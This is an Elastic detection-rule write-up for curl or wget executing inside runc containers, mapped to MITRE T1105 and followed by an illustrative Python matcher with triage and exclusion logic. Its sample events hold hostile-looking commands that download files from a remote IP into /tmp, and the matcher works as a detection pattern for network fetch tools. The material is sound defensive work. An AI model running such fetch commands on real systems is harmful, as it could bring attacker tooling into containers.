Curl or Wget Execution from Container Context

Elastic Detection Rules

Summary
This rule detects the execution of curl or wget by processes whose proctitle is runc init on Linux hosts instrumented with the Auditd Manager integration. The goal is to identify attempts to fetch tooling or exfiltrate data from within OCI/runc-backed containers, i.e., actions that often follow container breakout or privilege abuse. The match hinges on Linux Auditd events where process.title is runc init and either the executed binary is curl or wget (process.name) or the command line includes a curl/wget path (process.args). By anchoring to the container runtime boundary, the rule aims to distinguish potentially malicious container-contained downloads from legitimate host activity or image startup.

The rule corresponds to MITRE ATT&CK Ingress Tool Transfer (T1105) under the Command and Control tactic, reflecting the risk of downloading external tooling from within a container. It is designed for environments that ship Auditd Manager data and requires syscall audit coverage to capture execve-like events.

Triage and analysis guidance focuses on reconstructing full command lines from process.args/process.command_line, identifying URLs or output targets, and mapping events to container metadata (container.id, kubernetes.pod.*) to determine the workload and image involved. Cross-reference host/pod egress shortly after execution and review recent image or manifest changes to rule out expected startup behavior.

False positives may arise from legitimate startup scripts, base images, or CI/build pods running curl/wget; exclude known-good images or trusted registries and correlate with pipeline context. Remediation steps include isolating affected nodes/workloads, revoking relevant credentials, inspecting for dropped binaries or persistence mechanisms, and rotating any secrets the container could reach.

Setup notes emphasize ensuring execve coverage in Auditd Manager and accurate proctitle mapping for runc init across runtimes, with adjustments for alternatives like crun or containerd runtimes as needed.
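The match logic, the triage fields and the known-good image exclusion described above, worked through over constructed ECS-shaped events. This is an added example, not the Elastic rule's own query or code; the field names follow the summary (process.title, process.name, process.args, container.id, kubernetes.pod.name), while container.image.name, every sample value and the busybox/CI-image cases are assumptions made for illustration.

```python
import re

TOOLS = {"curl", "wget"}
RUNTIME_TITLE = "runc init"  # adjust for crun/containerd per the setup notes

# Constructed Auditd Manager events in ECS shape; all values are made up.
SAMPLE_EVENTS = [
    {"process": {"title": "runc init", "name": "curl",
                 "args": ["curl", "-fsSL", "http://198.51.100.7/tool.sh", "-o", "/tmp/t"]},
     "container": {"id": "abc123", "image": {"name": "example/app:1.0"}},
     "kubernetes": {"pod": {"name": "app-7d9f"}}},
    {"process": {"title": "runc init", "name": "busybox",  # wget reached via its path
                 "args": ["/bin/wget", "-q", "http://198.51.100.7/x", "-O", "/tmp/x"]},
     "container": {"id": "def456", "image": {"name": "example/worker:3"}},
     "kubernetes": {"pod": {"name": "worker-1"}}},
    {"process": {"title": "bash", "name": "curl",  # host-side curl, outside runc
                 "args": ["curl", "https://example.org/"]}},
    {"process": {"title": "runc init", "name": "curl",  # known-good CI build image
                 "args": ["curl", "-sL", "https://example.org/dep.tgz"]},
     "container": {"id": "789aaa", "image": {"name": "ci/builder:2"}},
     "kubernetes": {"pod": {"name": "build-42"}}},
]

def field(event, path):
    # Dotted ECS lookup, e.g. field(ev, "kubernetes.pod.name"); None when absent
    cur = event
    for part in path.split("."):
        cur = cur.get(part) if isinstance(cur, dict) else None
    return cur

def matches_rule(event):
    # runc init proctitle AND (curl/wget process.name OR a curl/wget path in process.args)
    if field(event, "process.title") != RUNTIME_TITLE:
        return False
    if field(event, "process.name") in TOOLS:
        return True
    return any(a.rsplit("/", 1)[-1] in TOOLS for a in field(event, "process.args") or [])

def triage(event):
    # Rebuild the command line and pull out URLs plus the workload identity
    cmd = field(event, "process.command_line") or " ".join(field(event, "process.args") or [])
    return {"command_line": cmd, "urls": re.findall(r"https?://\S+", cmd),
            "container_id": field(event, "container.id"),
            "image": field(event, "container.image.name"),
            "pod": field(event, "kubernetes.pod.name")}

def run_rule(events, known_good_images=frozenset()):
    # Apply the match, then suppress hits from explicitly trusted images
    return [t for t in (triage(e) for e in events if matches_rule(e))
            if t["image"] not in known_good_images]
```

Running run_rule(SAMPLE_EVENTS, known_good_images={"ci/builder:2"}) yields two alerts (the app pod and the worker pod), each carrying the reconstructed command line, the fetched URL and the container/pod identity an analyst would pivot on next.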
Categories
  • Endpoint
  • Linux
  • Containers
Data Sources
  • Process
  • Command
ATT&CK Techniques
  • T1105
Created: 2026-04-22